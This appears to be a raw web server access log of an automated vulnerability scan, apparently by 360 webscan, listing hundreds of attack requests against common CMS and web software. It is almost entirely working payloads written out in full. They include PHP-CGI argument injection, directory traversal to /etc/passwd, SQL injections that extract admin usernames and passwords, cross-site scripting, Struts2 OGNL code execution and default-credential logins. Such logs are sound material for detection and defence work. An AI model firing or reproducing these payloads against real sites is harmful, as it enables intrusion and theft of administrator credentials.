POST /cgi-bin/php.cgi?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini
POST /cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
POST /cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows/win.ini
POST /cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
GET /
GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
GET /phpMyAdmin/show_config_errors.php
GET /etc/passwd
GET /phpMyAdmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br][a%40http://webscan.360.cn%40]This%20Is%20a%20Link[%2Fa]
GET /etc/passwd
GET /xampp/index.php
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
GET /..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
GET /axis2/axis2-admin/login?userName=admin&password=axis2&submit=+Login+
GET /..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
GET /?search=just_test_not_find_href
GET /%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
GET /$
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
GET /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
GET /solr/dev/admin/
GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
GET /
GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
GET /.../.../.../.../.../.../.../.../etc/passwd
GET /level/15/exec/-/show/running-config/CR
GET /plugins/weathermap/weathermap-cacti-plugin.php
GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd
GET /
GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
GET /
GET /.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
GET /icons/index
GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
GET /icons/small/index
GET /%3Cscript%3Ealert(42873).do
GET /
GET /%3Cscript%20s%3Ealert(42873)
GET /
GET /?%22onmouseover='prompt(42873)'bad=%22%3E
GET /
GET /%22%3E%3CsCrIpT%3Eprompt(42873)
GET /
GET /?xss_test%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%3E
GET /
GET /?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
GET /
GET /'IHLD
GET /compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
GET /
GET /
GET /install.php
GET /
GET /install/index.php
GET /
GET /fckeditor/editor/dialog/fck_about.html
GET /
GET /extras/curltest.php?url=file://curltest.php
GET /
GET /.svn/entries
GET /
GET /include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1
GET /
GET /wap.php?pageBody=%3Cscript%3Ealert(42873)%3C/script%3E
GET /
POST /plus/carbuyaction.php
GET /
GET /plus/carbuyaction.php?dopost=return&code=../../index
GET /
GET /api/uc.php?code=fd92NqvC0fvDd3K8T4F9wiNlGHGg%2Bz13GSxyds04jK36mfZacZwYY5bVdHPO0hSTj4Zd4Q7mhGp70q%2BosC6PYhZZQxKJp3vOR5z5SQ
GET /yp/product.php?q=&action=searchlist&where=%23
GET /indivgroup_dispbbs.php?groupid=1&id=2&page=1&groupboardid=-1%20union%20all%20select%201,1,1,%200x73616665333,1,1,1,1,1,1,1,1,1
GET /yp/product.php?pagesize=$%7B@print(md5(42873))%7D
GET /index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+0x6A7573743A66696E6431,2,3,4,5,6--
GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
GET /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,42873,4,5,6,7%20from%20shopxp_admin
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /_database/qiye_free.asp
GET /apps/include.php?file=index.php
GET /huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20--
GET /wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
POST /manage/login.php
GET /vote.php?act=dovote&name[1%20and%20(select%201%20from(select%20count(*),concat(0x7c,(select%20(Select%20version())%20from%20information_schema.tables%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%23][111]=aa
GET /api/upload/swfthumbnail.php?id=../../include/common.inc.php
GET /Inc/conn.asp
POST /user/reg3.php
GET /News_search.asp?key=7%25'%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10%20from%20admin%20where%201%20or%20'%25'='&otype=title&Submit=%CB%D1%CB%F7
GET /celive/js/include.php?departmentid=webscan'&cmseasylive=1
GET /admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
GET /CompVisualizeBig.asp?id=-1%20union%20select%201,username%2bpassword,3,4,5%20from%20admin
GET /ask/search_ajax.php?q=s%bb%27
GET /yp/job.php?action=applylist&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /yp/job.php?action=list&genre=-1%2527%20or%20%2527a%2527=%2527a%2527
GET /web/?id=-1'
GET /huangou.php?id=1/**/and/**/1=2/**/ununionion/**/seselectlect/**/unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0/**/--
GET /js/calendar.php?lang=../js
GET /xampp/showcode.php/showcode.php?showcode=1
GET /index.php?case=../../../../../../../../../../../../../../../../etc/passwd%00
POST /login.php
GET /admin/index.asp
GET /Jingdian/Jingdian_Show.Asp?Jingdian_Id=-1%20and%201=2%20union%20select%201,admin_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20UU_admin
GET /user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+20120328,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
GET /phpcms/data/js.php?id=1
GET /index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,CONCAT(0x7c,username,0x7c,password,0x7c,CHAR(119,101,98,115,99,97,110)),7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20wiki_user%20where%20groupid=4%20limit%201%23
GET /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%2565%256C%2565%2563%2574%25201,2,username%252B%2527%257C%2527%252Bpassword%20from%20KS_Admin%2500
GET /user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
GET /Examples/Blog/index.php/abc/def/xxx/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc-abc-abc-$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
GET /abc,abc,abc,$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
GET /?user-getpass-1'
GET /?user-space-1'
POST /index.php
GET /admin/sysadmin_view.asp
GET /include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw
POST /index.php?user-getpass
GET /common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
GET /admin/EditorAdmin/upload.asp?id=1&d_viewmode=&dir=../admin
GET /member/ajax_membergroup.php?action=post&membergroup=@%60'%60%20Union%20select%20concat(0x3336307765627363616e,pwd,0x7c)%20from%20%60%23@__admin%60%20where%201%20or%20id=@%60'%60
POST /register.php?do=submit
POST /management/login.asp
GET /index.php?-dauto_prepend_file%3d/etc/passwd+-n
POST /tools/ajax.aspx
GET /show.php?id=10%20and%201=2%20union%20select%201,2,concat(adminname,0x7c,adminpass,0x7c,CHAR(51,54,48,119,101,98,115,99,97,110)),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20eaea_admin%20limit%201
GET /admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from%205u_Admin&id=1%20and%201=2%20UNION%20select%201%20from%205u_Admin
GET /bom.php?dir=.
GET /phpsso_server/api/uc.php?code=dec0Hfdu%2Fkh7g9qSMqxHkpAOUSB7uMJ2pqcxZm6kkdY0xAqAbUaqV3noA56dIyd908KlMSyij9SKQQ3U2gU5uHdUbLHh%2BF7ZnA3mVL2sjK5zXGI
GET /myly.aspx?username=test'%20and%20@@version%3E0--
GET /go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E
POST /?product-gnotify
POST /Index.action
POST /index.action
POST /login.action
POST /index.php/api/xmlrpc
GET /CVS/Root
GET /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20%7Bpre%7Dadmin
GET /index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
GET /index.php?m=search&a=public_get_suggest_keyword&url=http://www.baidu.com/&q=/../robots.txt
GET /plugin.php?id=Network114:Network114&ljtype=1%bf%27
GET /group/group.php?id=1%27webscan_draGxn
GET /dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
GET /index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1
GET /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
GET /?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
GET /category/1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
POST /upload/flow.php?step=update_cart
GET /user.php?act=is_registered&username=%CE%27360webscan%23
GET /do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
GET /do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
GET /zhuti/360webscan'
GET /js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
GET /js.php?jssort=shop&sort=1&num=2&panels=a'+and/**/1=2/**/union%20select+1,sha1('360webscan'),3,4,5%23
GET /search.php?query=a';?%3E%3C?exit(sha1('360webscan'));?%3E&modelid=1%20or%202=2
GET /WEB-INF/web.xml
GET /api.php?action=File&ctrl=download&path=api.php
GET /?/people/360webscan?notification_id-360webscan'
GET /?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
POST /fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F
GET /down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
GET /admin/manageAPP.php
GET /index.php?m=poster&c=index&a=poster_click&id=1
GET /yp/web/index.php?userid=999999999999999999999999999999999999&menu=die(md5($_GET%5bscan%5d))%3b&scan=webscan
GET /?/search/ajax/search_result/search_type-all__q-360webscan'
GET /?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
GET /index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
GET /api/datacall.php?type=user&by=360webscan&order=/**/&limit=1
GET /wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
POST /do/s_rpc.php
POST /new2/s_rpc.php
POST /video/s_rpc.php
POST /photo/s_rpc.php
POST /news/s_rpc.php
GET /plus/search.php?typeArr[2%27%20and%20@%60%5C%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28Select%20md5%280x7765627363616e%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
GET /page/html/?360webscan'.html
GET /Admin/sqlPlatform/operateSql.aspx
GET /respond.php?code=alipay&subject=0&out_trade_no=%00'order%20by%20010101010webscan%20--%20(
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
GET /php-ofc-library/ofc_upload_image.php?name=ed1e83f8d8d90aa943e4add2ce6a4cbf.txt
GET /member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&username=360webscan&password=ooxx&quickforward=yes&handlekey=webscan360
GET /e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
GET /pf/ratemovie.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /pf/rate.php?id=1%20and%201=2%20UNION%20ALL%20SELECT%20NULL,sha1(0x3336307765627363616e)
GET /plus/pf/rate.php?id=111%3D@%60%5C'%60+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+sha1(0x3336307765627363616e)),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+]=a
GET /index.php?ac=search&at=taglist&tagkey=a%2527
GET /wap/index.php?ac=search&at=taglist&tagkey=a%2527
POST /ckeditor/samples/sample_posteddata.php
GET /plus/carbuyaction.php?dopost=return&code=../../tags
POST /?cart-ajaxadd
GET /do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
GET /index.php?ac=order&at=list
GET /ajax.php?act=verify_ecv&ecvsn=360scan&ecvpassword=webscan%27
GET /ajax.php?act=verify_ecv&ecvsn=360scan%27
GET /include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E
POST /m.php?m=User&a=doLogin
GET /api.php?act=1&appname=../../core/html/pages/about.html%00
GET /ajax.php?act=check_field&field_name=user_name&field_data=webscan%27
GET /message.php?act=webscan'
GET /link.php?act=go&url=webscan.cn'
GET /showtopiclist.aspx?direct=0%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&forumid=-1&order=1&page=1&search=1&type=
GET /showtopiclist.aspx?direct=0&forumid=-1&order=1%22/%3E%3Cscript%3Ealert(42873)%3C/script%3E&page=1&search=1&type=
GET /include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E
GET /plus/bshare.php?dopost=getcode&uuid=%22%20onload=alert%281%29//
GET /group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E
GET /admin_aspcms/_content/_tag/aspcms_tag.asp
GET /admin_aspcms/index.asp
POST /admin_aspcms/_style/aspcms_stylefun.asp?action=edit
GET /do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
GET /index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /member.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Login.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /Index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')]
GET /resin-doc/viewfile/?file=index.jsp
POST /portal.php?diy=yes%22%3E%3C/ScRiPt%3E%3CScRiPt%3Ealert(/webscan/)%3C/ScRiPt%3E
POST /includes/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
POST /api/uc_client/control/mail.php
GET /api.php?op=video_api&pc_hash=1&uid=1&snid=%3C/script%3E%3Cscript%3Ealert(/42873/)%3C/script%3E//&do_complete=1%20
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&field=%29%3C/script%3E%3Cscript%3Ealert%2842873%29%3C/script%3E//
GET /api.php?op=map&maptype=1&defaultcity=%e5%22;alert%28/42873/%29;//
GET /api.php?op=map&maptype=1&defaultcity=%E5%8C%97%E4%BA%AC&api_key=%22%3E%3C/script%3E%3Cscript%3Ealert%28/42873/%29;%3C/script%3E
GET /api.php?op=map&maptype=1&city=test%3Cscript%3Ealert%28/42873/%29%3C/script%3E
GET /api.php?op=video_api&uid=1&snid=1&pc_hash=%3C/script%3E%3Cscript%3Ealert(/360/)%3C/script%3E//&do_complete=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /jiaoyou.php?pid=1'%20or%20@%60'%60%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,sha1(0x3336307765627363616e),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@%60'%60%20and%20'1'='1
GET /index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1
POST /subscribe.php?act=dounsubscribe
POST /productbuy/checkout.asp?11_22.html
GET /data/%23data.asp
POST /manage/Config/BackupRestore.aspx
GET /install/index.php.bak?insLockfile=1
GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=35
POST /?cart-addGoodsToCart.html
POST /install/index.php?step=active
GET /index.php?controller=block&action=spec_value_list&id=1%20union%20select%201,%28Select%20concat%280x5b,admin_name,0x3a,PassWord,0x5d%29%29,3,4,5,6%20from%20iwebshop_admin
GET /install/index.php?step=1&insLockfile=1
GET /plus/ajax_officebuilding.php?act=key&key=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,2,3,md5(1122),5,6,7,8,9%23
GET /plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27%20a%3C%3End%201=2%20un%3C%3Eion%20sel%3C%3Eect%201,md5(1122),3%20fr%3C%3Eom%20qs_admin%23
GET /plus/ad_js.php?aid=1&nocache=1
POST /admin.php
GET /resume/?key=xxxx%bf%22;alert(360);//
POST /register.php?do=check
GET /about/?module=../robots.txt&fmodule=7
GET /plus/Promotion.asp
GET /besthr/index.php?type=1%20and%20@%60%5C'%60%20or%20ascii(substring((select%20a_user%20from%20job_admin),1,1))=97%20%23@%60%5C'%60
GET /index.php?controller=site&action=getProduct&specJSON=%7B%20%22people%22:%221'%20and%201=2%20union%20select%20md5(1122),2,3,4,5,6,7,8,9%20and%20'1'='1%22%7D
GET /admin/admin_audit.php?status=1%27%29;phpinfo%28%29;//
POST /index.php?m=announcement&s=admin/notice
GET /item/?c-5,key-1'.html
GET /admin/fileopen.asp?filename=../index.asp
GET /cache/bak_mysql.txt
GET /index.php?case=archive&act=search&keyword=webscan%25%2527%29%09union%09select%090%2C0%2C0%2Cconcat%28username%2Cpassword%29%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%09from%09cmseasy_user%09where%09groupid%3D2%09union%09SELECT%09*%09FROM%09%60cmseasy_archive%60%09WHERE%09%28title%09like%09%2527%25aaaaaaaa
GET /api.php?act=../../robots.txt%00:template_info&api_version=1.0&app=12
GET /product-xxx-%3Cscript%20language=%22php%22%3Eecho%20%22webscan%22;-_set_compile.html
GET /user.php?back_act=http://127.0.0.1%22style=x:expression(alert(42873))%3E
POST /article_cat.php?id=12
POST /passport-verify.html
